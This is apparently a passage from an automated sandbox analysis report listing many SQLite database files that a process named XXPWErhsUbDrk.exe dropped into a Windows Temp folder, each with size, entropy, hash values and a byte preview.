SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\DU9KqcY5Fg

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5707520969659783
Encrypted:	false
SSDEEP:	12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	9F6D153D934BCC50E8BC57E7014B201A
SHA1:	50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
SHA-256:	2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
SHA-512:	B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
Malicious:	false
Preview:	SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Da2cWNnVqm

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\DdCBjfyxuu

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\DqCkoxK5Am

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Dr8yn6v3tZ

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\DucsEtpniw

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Dx33uJYG2K

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\EG1oPNbosu

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\EIvU6qULDb

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\EdMYncgtcK

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5712781801655107
Encrypted:	false
SSDEEP:	12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	05A60B4620923FD5D53B9204391452AF
SHA1:	DC12F90925033F25C70A720E01D5F8666D0B46E4
SHA-256:	6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
SHA-512:	068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\F7w3n3Nejz

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\FknuyWRhlQ

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\FmqJtWJ2ic

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\FuY6TZD3ta

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5712781801655107
Encrypted:	false
SSDEEP:	12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	05A60B4620923FD5D53B9204391452AF
SHA1:	DC12F90925033F25C70A720E01D5F8666D0B46E4
SHA-256:	6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
SHA-512:	068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\G9R9ktbnjw

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\G9SVanmpLl

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\GSk6SFHuh6

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5707520969659783
Encrypted:	false
SSDEEP:	12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	9F6D153D934BCC50E8BC57E7014B201A
SHA1:	50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
SHA-256:	2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
SHA-512:	B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
Malicious:	false
Preview:	SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\GXIOu0pkah

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\GdB4o2Atya

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\GvDFbWFsu2

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\HKTtgvPX44

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\HoWVhfrbVY

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\I4rSQ4DoPl

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\ISOrmyDptN

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Ib8h7ix79z

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\IcadMWqGKZ

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
